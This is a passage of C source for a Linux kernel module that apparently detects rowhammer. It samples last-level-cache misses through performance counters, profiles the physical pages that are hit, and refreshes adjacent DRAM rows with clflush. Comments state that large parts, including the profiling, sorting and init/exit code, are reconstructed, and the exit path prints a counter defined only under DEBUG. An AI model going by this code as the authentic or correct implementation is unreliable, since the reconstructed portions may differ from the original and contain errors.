					/* get page frame numbers for pages in the rows above and below */
					pfn1 = get_row_plus(profile[rec].phy_page, i);	/* pfn for victim row 1 */
					pfn2 = get_row_minus(profile[rec].phy_page, i);	/* pfn for victim row 2 */

					/* get the physical pages */
					pg1 = pfn_to_page(pfn1);
					pg2 = pfn_to_page(pfn2);

					/* map the pages to kernel space and refresh them:
					   the clflush forces the following read to go to
					   DRAM, which refreshes the victim row */
					virt = (unsigned long*)kmap(pg1);
					if (virt) {
						asm volatile("clflush (%0)"::"r"(virt):"memory");
						get_user(profile[rec].dummy1, virt);
						kunmap(pg1);
					}

					virt = (unsigned long*)kmap(pg2);
					if (virt) {
						asm volatile("clflush (%0)"::"r"(virt):"memory");
						get_user(profile[rec].dummy2, virt);
						kunmap(pg2);
					}
				}
#ifdef DEBUG
				refresh_count++;
#endif
			}
		}
	}

#ifdef DEBUG
	if (log_) {
		/* snapshot this round's profile into the log (reconstructed
		   around the surviving index clamp) */
		for (rec = 0; rec < record_size; rec++)
			log[log_index].profile[rec] = profile[rec];
		log[log_index].record_size = record_size;
		log[log_index].sample_total = sample_total;
		log[log_index].hammer_threshold = hammer_threshold;
		if (++log_index > 24999)
			log_index = 24999;
	}
#endif
	return;
}

/* Timer interrupt handler */
enum hrtimer_restart timer_callback(struct hrtimer *timer)
{
	ktime_t now;
	u64 enabled, running;
	int cpu;

	/* Update the LLC miss counter value */
	val = 0;
	for_each_online_cpu(cpu) {
		val += perf_event_read_value(per_cpu(llc_event, cpu), &enabled, &running);
	}

	miss_total = val - old_val;
	old_val = val;
	if (!sampling) {
		/* Start sampling if the miss count is high */
		if (miss_total > LLC_MISS_THRESHOLD) {
			start_sampling = 1;
			/* set the next interrupt interval for sampling */
			ktime = ktime_set(0, sample_timer_period);
			now = hrtimer_cb_get_time(timer);
			hrtimer_forward(&sample_timer, now, ktime);
		}

		else {
			/* set the next interrupt interval for counting */
			ktime = ktime_set(0, count_timer_period);
			now = hrtimer_cb_get_time(timer);
			hrtimer_forward(&sample_timer, now, ktime);
		}
	}

	else {
		ktime = ktime_set(0, count_timer_period);
		now = hrtimer_cb_get_time(timer);
		hrtimer_forward(&sample_timer, now, ktime);
	}

	/* start the task that analyzes LLC misses */
	queue_work(llc_event_wq, &task2);

	/* restart the timer */
	return HRTIMER_RESTART;
}

/* Groups samples according to the accessed physical pages */
static void build_profile(void)
{
	int rec, smpl, recorded;
	sample_t sample;

	if (sample_total > 0) {
		sample = sample_buffer[0];
		profile[0].phy_page = sample.phy_page;
		profile[0].page = (sample.addr);
		profile[0].llc_total_miss = 1;
		profile[0].llc_percent_miss = 100;
		profile[0].cpu = sample.cpu;
		record_size = 1;

		/* The rest of this function, sort() and the module init/exit
		   code are reconstructed from the declarations and call
		   sites above. */
		for (smpl = 1; smpl < sample_head; smpl++) {
			sample = sample_buffer[smpl];
			recorded = 0;
			/* count repeated samples of the same physical page */
			for (rec = 0; rec < record_size; rec++) {
				if (profile[rec].phy_page == sample.phy_page) {
					profile[rec].llc_total_miss++;
					recorded = 1;
					break;
				}
			}
			/* new page: add a record if the profile has room */
			if (!recorded && record_size < PROFILE_N) {
				profile[record_size].phy_page = sample.phy_page;
				profile[record_size].page = sample.addr;
				profile[record_size].llc_total_miss = 1;
				profile[record_size].cpu = sample.cpu;
				profile[record_size].hammer = 0;
				record_size++;
			}
		}

		/* convert per-page counts into percentages of all samples */
		for (rec = 0; rec < record_size; rec++)
			profile[rec].llc_percent_miss =
				(profile[rec].llc_total_miss*100)/sample_total;
	}
}

/* Sorts the profile so the page with the most samples comes first */
static void sort(void)
{
	int i, j;
	profile_t tmp;

	for (i = 0; i < record_size; i++) {
		for (j = i+1; j < record_size; j++) {
			if (profile[j].llc_total_miss > profile[i].llc_total_miss) {
				tmp = profile[i];
				profile[i] = profile[j];
				profile[j] = tmp;
			}
		}
	}
}

static int __init start_init(void)
{
	int cpu;

	/* work queues for the sampling and action stages */
	action_wq = create_workqueue("action_wq");
	llc_event_wq = create_workqueue("llc_event_wq");
	INIT_WORK(&task, action_wq_callback);
	INIT_WORK(&task2, llc_event_wq_callback);

	/* create the per-CPU performance counters declared in anvil.h */
	for_each_online_cpu(cpu) {
		per_cpu(llc_event, cpu) = perf_event_create_kernel_counter(
			&llc_miss_event, cpu, NULL, llc_event_callback, NULL);
		per_cpu(l1D_event, cpu) = perf_event_create_kernel_counter(
			&l1D_miss_event, cpu, NULL, l1D_event_callback, NULL);
		per_cpu(ld_lat_event, cpu) = perf_event_create_kernel_counter(
			&load_latency_event, cpu, NULL, load_latency_callback, NULL);
		per_cpu(precise_str_event, cpu) = perf_event_create_kernel_counter(
			&precise_str_event_attr, cpu, NULL, precise_str_callback, NULL);
	}

	/* arm the periodic timer that drives the detector */
	ktime = ktime_set(0, count_timer_period);
	hrtimer_init(&sample_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
	sample_timer.function = &timer_callback;
	hrtimer_start(&sample_timer, ktime, HRTIMER_MODE_REL);

	printk("anvil: module loaded\n");
	return 0;
}

static void __exit finish_exit(void)
{
	int cpu;
#ifdef DEBUG
	int i, rec;
#endif

	hrtimer_cancel(&sample_timer);
	flush_workqueue(llc_event_wq);
	flush_workqueue(action_wq);
	destroy_workqueue(llc_event_wq);
	destroy_workqueue(action_wq);

	for_each_online_cpu(cpu) {
		perf_event_release_kernel(per_cpu(llc_event, cpu));
		perf_event_release_kernel(per_cpu(l1D_event, cpu));
		perf_event_release_kernel(per_cpu(ld_lat_event, cpu));
		perf_event_release_kernel(per_cpu(precise_str_event, cpu));
	}

	printk("sampled %lu times, detected %lu, refreshed %lu\n",
	       L1_count, L2_count, refresh_count);

#ifdef DEBUG
	printk(">>>>>>>>>>>>>>>log dump>>>>>>>>>>>>>>>\n");
	/* dump all the logs */
	for (i = 0; i < log_index; i++) {
		for (rec = 0; rec < log[i].record_size; rec++) {
			printk("page %lx samples %lu percent %u hammer %d\n",
			       log[i].profile[rec].phy_page,
			       log[i].profile[rec].llc_total_miss,
			       log[i].profile[rec].llc_percent_miss,
			       log[i].profile[rec].hammer);
		}
	}
	printk(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n");
	return;
#endif
}

module_init(start_init);
module_exit(finish_exit);
--------------------------------------------------------------------------------